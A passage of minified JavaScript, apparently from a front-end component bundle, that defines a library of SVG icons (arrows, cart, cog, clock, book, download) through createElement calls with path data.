32.75"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M30.05 32.254H2.55a2.05 2.05 0 1 1 0-4.1H25.1l-24-24a2.05 2.05 0 0 1 2.9-2.9l24 24V2.704a2.05 2.05 0 1 1 4.1 0v29.55Z"})),angle_top_left_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.6 32.6"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"m28.6 31.5-24-24v22.55a2.05 2.05 0 1 1-4.1 0V.5h29.55a2.05 2.05 0 1 1 0 4.1H7.5l24 24a2.05 2.05 0 1 1-2.9 2.9Z"})),angle_top_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.6 32.6"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M28 30.05V7.5l-24 24a2.05 2.05 0 1 1-2.9-2.9l24-24H2.551a2.05 2.05 0 1 1 0-4.1H32.1V30.05a2.05 2.05 0 1 1-4.1 0Z"})),leftAngle:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",enableBackground:"new 0 0 53.76 53.76",version:"1.1",viewBox:"0 0 53.76 53.76"},(0,o.createElement)("g",null,(0,o.createElement)("path",{className:"active-path",d:"M44.574,53.76L9.186,26.88L44.574,0V53.76z M13.044,26.88l29.194,22.172V4.709L13.044,26.88z","data-original":"#000000"}))),rightAngle:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",enableBackground:"new 0 0 53.76 53.76",version:"1.1",viewBox:"0 0 53.76 53.76"},(0,o.createElement)("g",{transform:"matrix(-1 3.6739e-16 -3.6739e-16 -1 53.76 53.76)"},(0,o.createElement)("path",{className:"active-path",d:"M44.574,53.76L9.186,26.88L44.574,0V53.76z M13.044,26.88l29.194,22.172V4.709L13.044,26.88z","data-original":"#000000"}))),leftAngle2:(0,o.createElement)("svg",{enableBackground:"new 0 0 477.175 477.175",version:"1.1",viewBox:"0 0 477.18 477.18"},(0,o.createElement)("path",{d:"m145.19 238.58 215.5-215.5c5.3-5.3 5.3-13.8 0-19.1s-13.8-5.3-19.1 0l-225.1 225.1c-5.3 5.3-5.3 13.8 0 19.1l225.1 225c2.6 2.6 6.1 4 9.5 4s6.9-1.3 9.5-4c5.3-5.3 5.3-13.8 0-19.1l-215.4-215.5z"})),rightAngle2:(0,o.createElement)("svg",{enableBackground:"new 0 0 477.175 477.175",version:"1.1",viewBox:"0 0 477.18 477.18"},(0,o.createElement)("path",{d:"m360.73 229.08-225.1-225.1c-5.3-5.3-13.8-5.3-19.1 0s-5.3 13.8 0 19.1l215.5 215.5-215.5 215.5c-5.3 5.3-5.3 13.8 0 19.1 2.6 2.6 6.1 4 9.5 4s6.9-1.3 9.5-4l225.1-225.1c5.3-5.2 5.3-13.8 0.1-19z"})),collapse_bottom_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 34.1 19.95"},(0,o.createElement)("path",{d:"M17.05 19.949.601 3.499a2.05 2.05 0 0 1 2.9-2.9l13.551 13.55L30.603.599a2.05 2.05 0 0 1 2.9 2.9Z"})),arrowUp2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 34.1 19.95"},(0,o.createElement)("path",{d:"M32.05 19.949a2.041 2.041 0 0 1-1.45-.6L17.05 5.8 3.498 19.349a2.05 2.05 0 0 1-2.9-2.9l16.45-16.45 16.448 16.45a2.05 2.05 0 0 1-1.448 3.5"})),longArrowUp2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 493.35 493.35"},(0,o.createElement)("path",{d:"m354.03 112.49-101.36-109.64c-1.905-1.903-4.189-2.853-6.856-2.853-2.478 0-4.665 0.95-6.567 2.853l-99.927 109.64c-2.475 3.049-2.952 6.377-1.431 9.994 1.524 3.616 4.283 5.424 8.28 5.424h63.954v356.32c0 2.663 0.855 4.853 2.57 6.564 1.713 1.707 3.899 2.562 6.567 2.562h54.816c2.669 0 4.859-0.855 6.563-2.562 1.711-1.712 2.573-3.901 2.573-6.564v-356.32h63.954c3.806 0 6.563-1.809 8.274-5.424 1.53-3.621 1.052-6.949-1.412-9.995z"})),arrow_left_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"m22.551 34.324-8.849-8.85-.055-.055-1.422-1.42 1.418-1.418.063-.063 8.845-8.844a2.05 2.05 0 0 1 2.9 2.9l-5.378 5.375h12.8a2.05 2.05 0 0 1 0 4.1h-12.8l5.376 5.377a2.05 2.05 0 1 1-2.9 2.9Z"}))),arrow_bottom_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M13.675 25.449a2.05 2.05 0 0 1 2.9-2.9l5.377 5.376V15.124a2.05 2.05 0 1 1 4.1 0v12.8l5.377-5.377a2.05 2.05 0 0 1 2.9 2.9L24 35.774Z"}))),arrow_right_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M22.551 34.324a2.048 2.048 0 0 1 0-2.9l5.376-5.377H15.125a2.05 2.05 0 0 1 0-4.1h12.8l-5.374-5.373a2.05 2.05 0 1 1 2.9-2.9l8.845 8.843.063.062 1.416 1.42-1.422 1.422-.055.055-8.849 8.848a2.047 2.047 0 0 1-2.9 0Z"}))),arrow_top_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M21.951 32.875V20.073l-5.376 5.375a2.05 2.05 0 0 1-2.9-2.9l8.852-8.849.048-.049 1.426-1.425 1.422 1.422.055.055 8.847 8.847a2.05 2.05 0 1 1-2.9 2.9l-5.374-5.376v12.8a2.05 2.05 0 0 1-4.1 0Z"}))),close_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"m29.655 32.553-5.656-5.656-5.654 5.656a2.05 2.05 0 0 1-2.9-2.9l5.656-5.654-5.656-5.654a2.05 2.05 0 0 1 2.9-2.9l5.654 5.656 5.656-5.656a2.05 2.05 0 0 1 2.9 2.9l-5.658 5.654 5.656 5.655a2.05 2.05 0 1 1-2.9 2.9Z"}))),close_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 31.1 31.25"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M27.1 30.153 15.549 18.601 4 30.153a2.05 2.05 0 0 1-2.9-2.9l11.551-11.55L1.1 4.153a2.05 2.05 0 0 1 2.9-2.9l11.549 11.552L27.1 1.253a2.05 2.05 0 0 1 2.9 2.9l-11.553 11.55L30 27.253a2.05 2.05 0 1 1-2.9 2.9Z"})),arrow_down_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 37.1 49.16"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M1.1 31A2.05 2.05 0 1 1 4 28.1l12.5 12.5V2.55a2.05 2.05 0 0 1 4.1 0V40.6l12.5-12.5A2.05 2.05 0 1 1 36 31L18.549 48.45Z"})),leftArrowLg:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.16 37.25"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M18.157 36.154 2.183 20.179l-.053-.053-1.423-1.423 17.45-17.449a2.05 2.05 0 0 1 2.9 2.9l-12.503 12.5h38.053a2.05 2.05 0 1 1 0 4.1H8.555l12.5 12.5a2.05 2.05 0 1 1-2.9 2.9Z"})),rightArrowLg:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.16 37.25"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M28.1 36.154a2.048 2.048 0 0 1 0-2.9l12.5-12.5H2.55a2.05 2.05 0 1 1 0-4.1H40.6l-12.5-12.5a2.05 2.05 0 1 1 2.9-2.9l17.45 17.448L31 36.154a2.047 2.047 0 0 1-2.9 0Z"})),arrow_up_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 37.1 49.16"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M16.5 46.607V8.555L4 21.055a2.05 2.05 0 0 1-2.9-2.9L18.549.707l1.423 1.423.053.053L36 18.157a2.05 2.05 0 1 1-2.9 2.9L20.6 8.556v38.051a2.05 2.05 0 1 1-4.1 0Z"})),down_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M.002 24a24 24 0 1 1 24 24 24 24 0 0 1-24-24m25.114 12.043 11.063-11.057a1.126 1.126 0 0 0-.795-1.921h-7.135V12.437a.952.952 0 0 0-.952-.951h-6.6a.95.95 0 0 0-.945.951v10.624h-7.136a1.126 1.126 0 0 0-.8 1.921l11.063 11.057a1.572 1.572 0 0 0 2.234 0"})),right_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m12.043 25.114L24.986 36.177a1.125 1.125 0 0 1-1.92-.8v-7.135H12.438a.952.952 0 0 1-.951-.952v-6.6a.95.95 0 0 1 .951-.945h10.629v-7.136a1.126 1.126 0 0 1 1.92-.8l11.057 11.063a1.572 1.572 0 0 1 0 2.234"})),left_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 48A24 24 0 1 0 0 24a24 24 0 0 0 24 24M11.956 22.886l11.057-11.063a1.126 1.126 0 0 1 1.921.795v7.135h10.628a.952.952 0 0 1 .951.952v6.6a.95.95 0 0 1-.951.945H24.934v7.136a1.126 1.126 0 0 1-1.921.8L11.956 25.123a1.572 1.572 0 0 1 0-2.234"})),up_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M0 24A24 24 0 1 0 24 0 24 24 0 0 0 0 24m25.114-12.045 11.063 11.058a1.126 1.126 0 0 1-.795 1.921h-7.135v10.627a.952.952 0 0 1-.952.951h-6.6a.95.95 0 0 1-.945-.951V24.934h-7.136a1.126 1.126 0 0 1-.8-1.921l11.064-11.058a1.573 1.573 0 0 1 2.233 0"})),wrong_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24.032 24.032 0 0 0 24 0m9.648 30.151a2.475 2.475 0 0 1-3.5 3.5l-6.139-6.138-6.151 6.138a2.475 2.475 0 0 1-3.5-3.5l6.15-6.139-6.15-6.15a2.475 2.475 0 1 1 3.5-3.5l6.151 6.151 6.139-6.151a2.475 2.475 0 1 1 3.5 3.5l-6.139 6.15Z"})),bottom_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.2 35.44"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M.5 32.893V22.62a10.284 10.284 0 0 1 10.272-10.272h29.871l-8.192-8.193a2.05 2.05 0 0 1 2.9-2.9l11.667 11.669.048.048 1.425 1.425-13.142 13.141a2.05 2.05 0 0 1-2.9-2.9l8.193-8.193h-29.87A6.178 6.178 0 0 0 4.6 22.62v10.273a2.05 2.05 0 0 1-4.1 0Z"})),bottom_left_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.2 35.29"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M44.6 32.738V22.465a6.179 6.179 0 0 0-6.173-6.172H8.555l8.192 8.193a2.05 2.05 0 1 1-2.9 2.9L.707 14.243 13.849 1.1a2.05 2.05 0 1 1 2.9 2.9l-8.194 8.193h29.872A10.285 10.285 0 0 1 48.7 22.465v10.273a2.05 2.05 0 0 1-4.1 0Z"})),top_left_angle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.2 35.29"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M13.849 34.186.707 21.046 13.849 7.9a2.05 2.05 0 1 1 2.9 2.9L8.556 19h29.871a6.179 6.179 0 0 0 6.173-6.17V2.55a2.05 2.05 0 1 1 4.1 0v10.276A10.283 10.283 0 0 1 38.427 23.1H8.556l8.191 8.192a2.05 2.05 0 1 1-2.9 2.9Z"})),top_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.2 35.29"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M32.452 34.186a2.048 2.048 0 0 1 0-2.9l8.192-8.186H10.772A10.283 10.283 0 0 1 .5 12.826V2.55a2.05 2.05 0 0 1 4.1 0v10.276a6.177 6.177 0 0 0 6.171 6.17h29.873L32.452 10.8a2.05 2.05 0 1 1 2.9-2.9l13.141 13.146-13.143 13.14a2.047 2.047 0 0 1-2.9 0Z"})),at_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.01 49"},(0,o.createElement)("g",null,(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M22.827 48.441A24 24 0 0 1 25.213.51c12.848.371 23.3 11.359 23.3 24.492a10.359 10.359 0 0 1-10.349 10.352 6.9 6.9 0 0 1-5.878-3.289 10.854 10.854 0 1 1-1.022-16.055v-.313a2.05 2.05 0 1 1 4.1 0v12.757a2.8 2.8 0 0 0 2.8 2.8 6.255 6.255 0 0 0 6.249-6.252c0-10.94-8.663-20.091-19.312-20.4a20.089 20.089 0 0 0-15 6.172 19.723 19.723 0 0 0-5.426 15.328 19.9 19.9 0 0 0 32.162 14.02 2.05 2.05 0 1 1 2.542 3.217 23.974 23.974 0 0 1-14.887 5.163q-.832 0-1.665-.061Zm-5.071-23.939a6.754 6.754 0 1 0 6.757-6.757 6.762 6.762 0 0 0-6.757 6.757Z"}))),refresh:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",enableBackground:"new 0 0 491.236 491.236",version:"1.1",viewBox:"0 0 491.24 491.24"},(0,o.createElement)("path",{d:"m55.89 262.82c-3-26-0.5-51.1 6.3-74.3 22.6-77.1 93.5-133.8 177.6-134.8v-50.4c0-2.8 3.5-4.3 5.8-2.6l103.7 76.2c1.7 1.3 1.7 3.9 0 5.1l-103.6 76.2c-2.4 1.7-5.8 0.2-5.8-2.6v-50.3c-55.3 0.9-102.5 35-122.8 83.2-7.7 18.2-11.6 38.3-10.5 59.4 1.5 29 12.4 55.7 29.6 77.3 9.2 11.5 7 28.3-4.9 37-11.3 8.3-27.1 6-35.8-5-21.3-26.6-35.5-59-39.6-94.4zm299.4-96.8c17.3 21.5 28.2 48.3 29.6 77.3 1.1 21.2-2.9 41.3-10.5 59.4-20.3 48.2-67.5 82.4-122.8 83.2v-50.3c0-2.8-3.5-4.3-5.8-2.6l-103.7 76.2c-1.7 1.3-1.7 3.9 0 5.1l103.6 76.2c2.4 1.7 5.8 0.2 5.8-2.6v-50.4c84.1-0.9 155.1-57.6 177.6-134.8 6.8-23.2 9.2-48.3 6.3-74.3-4-35.4-18.2-67.8-39.5-94.4-8.8-11-24.5-13.3-35.8-5-11.8 8.7-14 25.5-4.8 37z"})),cart_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44.45 44.14"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M16.72 37.679a3.232 3.232 0 1 0 3.232 3.231 3.234 3.234 0 0 0-3.232-3.231"}),(0,o.createElement)("path",{d:"M33.751 37.679a3.232 3.232 0 1 0 3.232 3.231 3.234 3.234 0 0 0-3.232-3.231"}),(0,o.createElement)("path",{d:"M43.4 6.841A4.557 4.557 0 0 0 39.888 5.2H9.727A6.3 6.3 0 0 0 3.567 0H2.05a2.05 2.05 0 1 0 0 4.1h1.517a2.177 2.177 0 0 1 2.14 1.844l3.2 21.424a8.818 8.818 0 0 0 8.669 7.47h19.2a2.05 2.05 0 1 0 0-4.1h-19.2a4.694 4.694 0 0 1-4.614-3.977l-.022-.145h23.628a5.817 5.817 0 0 0 5.718-4.755l2.091-11.266a4.558 4.558 0 0 0-.977-3.754m-5.145 14.271a1.715 1.715 0 0 1-1.687 1.4H12.332L10.354 9.3h29.534a.466.466 0 0 1 .458.551Z"}))),cart_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44.46 44.14"},(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",null,(0,o.createElement)("path",{d:"M0 0h44.458v44.14H0z"}))),(0,o.createElement)("g",{"clip-path":"url(#a)"},(0,o.createElement)("path",{d:"M19.95 40.91a3.23 3.23 0 1 1-3.23-3.23 3.235 3.235 0 0 1 3.23 3.23"}),(0,o.createElement)("path",{d:"M36.99 40.91a3.235 3.235 0 1 1-3.24-3.23 3.237 3.237 0 0 1 3.24 3.23"}),(0,o.createElement)("path",{d:"M43.4 6.84a4.568 4.568 0 0 0-3.51-1.64H9.73A6.3 6.3 0 0 0 3.57 0H2.05a2.05 2.05 0 0 0 0 4.1h1.52a2.179 2.179 0 0 1 2.14 1.84l3.2 21.43a8.826 8.826 0 0 0 8.67 7.47h19.2a2.05 2.05 0 1 0 0-4.1h-19.2a4.693 4.693 0 0 1-4.61-3.98l-.02-.14h23.62a5.819 5.819 0 0 0 5.72-4.76l2.09-11.26a4.567 4.567 0 0 0-.98-3.76m-10.96 9.79a.48.48 0 0 1-.48.48h-4.08a.48.48 0 0 0-.48.48v4.08a.48.48 0 0 1-.48.48h-2.04a.487.487 0 0 1-.48-.48v-4.08a.474.474 0 0 0-.48-.48h-4.08a.487.487 0 0 1-.48-.48v-2.04a.48.48 0 0 1 .48-.48h4.08a.48.48 0 0 0 .48-.48V9.55a.48.48 0 0 1 .48-.48h2.04a.474.474 0 0 1 .48.48v4.08a.487.487 0 0 0 .48.48h4.08a.474.474 0 0 1 .48.48Z"}))),cog_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 47.02 47.02"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"m26.755 4.404 3.5.939-.432 3.236-.324 2.43 1.987 1.435a12.34 12.34 0 0 1 3.091 3.091l1.435 1.987 2.43-.324 3.236-.432.939 3.5-3 1.237-2.272.937-.246 2.444a13.573 13.573 0 0 1-1.143 4.222l-1 2.238 1.5 1.944 1.989 2.582-2.565 2.565-2.583-1.989-1.944-1.5-2.238 1.006a13.632 13.632 0 0 1-4.221 1.143l-2.445.245-.936 2.272-1.237 3-3.5-.939.432-3.235.324-2.429-1.986-1.436a12.3 12.3 0 0 1-3.092-3.092l-1.436-1.986-2.429.324-3.236.431-.938-3.5 3-1.237 2.271-.936.246-2.445a13.644 13.644 0 0 1 1.143-4.222l1.005-2.238-1.5-1.943-1.989-2.583 2.564-2.565 2.583 1.989 1.944 1.5 2.238-1.005a13.613 13.613 0 0 1 4.222-1.144l2.444-.245.936-2.271Zm-.928-4.4a2.529 2.529 0 0 0-2.337 1.565l-1.763 4.278a17.735 17.735 0 0 0-5.492 1.483l-3.677-2.832a2.527 2.527 0 0 0-3.33.216L4.71 9.231a2.528 2.528 0 0 0-.215 3.33l2.831 3.677a17.765 17.765 0 0 0-1.483 5.492l-4.277 1.764a2.527 2.527 0 0 0-1.479 2.991l1.654 6.171a2.53 2.53 0 0 0 2.776 1.852l4.6-.614a16.438 16.438 0 0 0 4.013 4.013l-.614 4.6a2.527 2.527 0 0 0 1.852 2.776l6.17 1.654a2.56 2.56 0 0 0 .656.086 2.528 2.528 0 0 0 2.336-1.565l1.763-4.278a17.732 17.732 0 0 0 5.493-1.482l3.676 2.831a2.53 2.53 0 0 0 3.331-.215l4.517-4.518a2.528 2.528 0 0 0 .216-3.33l-2.832-3.677a17.738 17.738 0 0 0 1.483-5.492l4.278-1.763a2.529 2.529 0 0 0 1.478-2.992l-1.653-6.171a2.528 2.528 0 0 0-2.44-1.874 2.562 2.562 0 0 0-.337.022l-4.6.615a16.347 16.347 0 0 0-4.013-4.013l.614-4.6a2.528 2.528 0 0 0-1.851-2.776L26.482.092a2.506 2.506 0 0 0-.655-.087"}),(0,o.createElement)("path",{d:"M23.513 19.631a3.877 3.877 0 1 1-2.742 1.136 3.851 3.851 0 0 1 2.742-1.136m0-4.1a7.977 7.977 0 1 0 5.641 2.337 7.952 7.952 0 0 0-5.641-2.337"}))),cog_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"m47.916 20.964-1.7-6.3a2.568 2.568 0 0 0-2.828-1.889l-4.706.623a19.016 19.016 0 0 0-1.868-2.225 18.136 18.136 0 0 0-2.225-1.868l.622-4.7a2.579 2.579 0 0 0-1.888-2.838l-6.3-1.684a2.569 2.569 0 0 0-3.052 1.511l-1.8 4.358a18.146 18.146 0 0 0-5.614 1.521L12.81 4.585a2.57 2.57 0 0 0-3.4.214L4.796 9.413a2.584 2.584 0 0 0-.225 3.4l2.889 3.756a18.282 18.282 0 0 0-1.511 5.6l-4.369 1.8a2.58 2.58 0 0 0-1.5 3.052l1.685 6.3a2.578 2.578 0 0 0 2.838 1.888l4.7-.622a16.716 16.716 0 0 0 4.093 4.093l-.623 4.706a2.561 2.561 0 0 0 1.889 2.827l6.3 1.695a2.58 2.58 0 0 0 3.052-1.511l1.807-4.369a18.124 18.124 0 0 0 5.6-1.511l3.747 2.889a2.6 2.6 0 0 0 3.409-.224l4.6-4.6a2.585 2.585 0 0 0 .225-3.4l-2.889-3.757a18.143 18.143 0 0 0 1.511-5.6l4.369-1.806a2.591 2.591 0 0 0 1.511-3.052m-17.622 9.327a8.9 8.9 0 1 1 0-12.592 8.895 8.895 0 0 1 0 12.592"})),correct_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24.032 24.032 0 0 0 24 0m12.808 18.247L21.877 33.19a2.68 2.68 0 0 1-1.917.784h-.012a2.724 2.724 0 0 1-1.918-.784l-6.826-6.839a2.475 2.475 0 1 1 3.5-3.5l5.247 5.258 13.362-13.362a2.475 2.475 0 1 1 3.5 3.5"})),dot_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 16.39 16.39"},(0,o.createElement)("path",{d:"M16.389 8.194A8.194 8.194 0 1 1 8.195 0a8.194 8.194 0 0 1 8.194 8.194"})),clock:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",enableBackground:"new 0 0 559.98 559.98",viewBox:"0 0 559.98 559.98"},(0,o.createElement)("path",{d:"m279.99 0c-154.39 0-279.99 125.6-279.99 279.99 0 154.39 125.6 279.99 279.99 279.99 154.39 0 279.99-125.6 279.99-279.99s-125.6-279.99-279.99-279.99zm0 498.78c-120.64 0-218.79-98.146-218.79-218.79 0-120.64 98.146-218.79 218.79-218.79s218.79 98.152 218.79 218.79c0 120.64-98.146 218.79-218.79 218.79z"}),(0,o.createElement)("path",{d:"m304.23 280.33v-117.35c0-13.103-10.618-23.721-23.716-23.721-13.102 0-23.721 10.618-23.721 23.721v124.93c0 0.373 0.092 0.723 0.11 1.096-0.312 6.45 1.91 12.999 6.836 17.926l88.343 88.336c9.266 9.266 24.284 9.266 33.543 0 9.26-9.266 9.266-24.284 0-33.544l-81.395-81.392z"})),book:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",enableBackground:"new 0 0 485.5 485.5",viewBox:"0 0 485.5 485.5"},(0,o.createElement)("path",{d:"m422.1 126.2h-295.7c-27.4 0-49.8-22.3-49.8-49.8 0-27.4 22.3-49.8 49.8-49.8h295.8c7.4 0 13.3-6 13.3-13.3 0-7.4-6-13.3-13.3-13.3h-295.8c-42.1 0-76.4 34.3-76.4 76.4v332.7c0 42.1 34.3 76.4 76.4 76.4h295.8c7.4 0 13.3-6 13.3-13.3v-332.7c-0.1-7.3-6-13.3-13.4-13.3zm-13.3 332.7h-282.4c-27.4 0-49.8-22.3-49.8-49.8v-274.7c13.4 11.5 30.8 18.5 49.8 18.5h282.4v306z"}),(0,o.createElement)("path",{d:"M130.6,64.3c-7.4,0-13.3,6-13.3,13.3s6,13.3,13.3,13.3h249.8c7.4,0,13.3-6,13.3-13.3s-6-13.3-13.3-13.3H130.6z"}),(0,o.createElement)("path",{d:"m177.4 400.7c1.5 0.5 3 0.8 4.5 0.8 5.5 0 10.6-3.4 12.5-8.8l16.2-45.3h62.4c0.5 0 1.1 0 1.6-0.1l16.2 45.4c1.9 5.4 7.1 8.8 12.5 8.8 1.5 0 3-0.3 4.5-0.8 6.9-2.5 10.5-10.1 8-17l-60.6-169.9c-0.1-0.4-0.3-0.8-0.5-1.2l-0.6-1.2c-0.1-0.2-0.3-0.4-0.4-0.7-0.1-0.1-0.2-0.3-0.3-0.4-0.1-0.2-0.3-0.4-0.5-0.6-0.1-0.1-0.2-0.3-0.4-0.4-0.1-0.2-0.3-0.3-0.5-0.5s-0.3-0.3-0.5-0.5c-0.1-0.1-0.3-0.2-0.4-0.4-0.2-0.2-0.4-0.3-0.6-0.5-0.1-0.1-0.3-0.2-0.4-0.3-0.2-0.1-0.4-0.3-0.6-0.4l-0.6-0.3s-0.4-0.2-0.6-0.3c-0.4-0.2-0.8-0.4-1.2-0.5h-0.1l-1.2-0.3c-0.2 0-0.3-0.1-0.5-0.1-0.3-0.1-0.5-0.1-0.8-0.2-0.2 0-0.4 0-0.6-0.1-0.2 0-0.5-0.1-0.7-0.1s-0.4 0-0.6 0h-0.7c-0.2 0-0.5 0-0.7 0.1-0.2 0-0.4 0-0.6 0.1-0.3 0-0.5 0.1-0.8 0.2-0.2 0-0.3 0.1-0.5 0.1-0.4 0.1-0.8 0.2-1.1 0.3h-0.1c-0.4 0.1-0.8 0.3-1.2 0.5l-1.2 0.6c-0.2 0.1-0.4 0.3-0.7 0.4-0.1 0.1-0.3 0.2-0.4 0.3-0.2 0.2-0.4 0.3-0.6 0.5-0.1 0.1-0.3 0.2-0.4 0.4l-0.5 0.5s-0.3 0.3-0.5 0.5c-0.1 0.1-0.2 0.3-0.4 0.4-0.2 0.2-0.3 0.4-0.5 0.6-0.1 0.1-0.2 0.3-0.3 0.4-0.1 0.2-0.3 0.4-0.4 0.6l-0.6 1.2c-0.2 0.4-0.4 0.8-0.5 1.2l-60.8 169.9c-2.2 7 1.4 14.6 8.3 17.1zm65.3-142.9 22.5 63h-45.1l22.6-63z"})),download_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 41.99"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M21 32.48 9.307 20.786a2.05 2.05 0 0 1 2.9-2.9l8.8 8.794 8.795-8.794a2.05 2.05 0 0 1 2.9 2.9Z"}),(0,o.createElement)("path",{d:"M21 31.625a2.05 2.05 0 0 1-2.05-2.05V2.045a2.05 2.05 0 1 1 4.1 0v27.53a2.05 2.05 0 0 1-2.05 2.05"}),(0,o.createElement)("path",{d:"M37.603 41.992H4.397a4.368 4.368 0 0 1-4.4-4.331v-8.693a2.05 2.05 0 0 1 4.1 0v8.693a.273.273 0 0 0 .3.231h33.206a.273.273 0 0 0 .3-.231v-8.693a2.05 2.05 0 1 1 4.1 0v8.693a4.368 4.368 0 0 1-4.4 4.331"}))),download_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 